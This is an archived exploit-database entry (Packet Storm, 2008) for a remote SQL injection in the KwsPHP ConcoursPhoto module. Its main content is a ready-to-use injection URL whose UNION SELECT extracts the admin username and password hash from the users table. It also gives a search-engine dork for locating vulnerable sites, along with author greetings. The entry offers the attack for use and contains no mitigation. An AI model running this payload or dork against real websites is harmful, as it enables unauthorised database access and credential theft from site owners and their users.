kwsphpconcor-sql.txt

2008-04-04T00:00:00
ID PACKETSTORM:65172
Type packetstorm
Reporter Stack-Terrorist
Modified 2008-04-04T00:00:00

Description

                                        
                                            `#########################################################################  
KwsPHP Module ConcoursPhoto Remote SQL Injection Exploit  
#########################################################################  
  
## AUTHOR : Stack-Terrorist [v40]  
## Email : admin@v4-team.com  
## Home : http://v4-team.com & http://stack-terrorist.com  
## Script : KwsPHP Module ConcoursPhoto  
## Bug : Remote SQL Injection Exploit  
## Dork : inurl:index.php?mod=ConcoursPhoto  
  
## EXPLOITS :  
  
http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/**/union/**/select/**/concat(pseudo,0x3a,pass)/**/from/**/users/**/where/**/id=1/*  
  
## GREETZ : All muslims Hackers  
## speacial thnx to : str0ke  
  
#########################################################################  
Stack-Terrorist [v40]  
#########################################################################  
  
`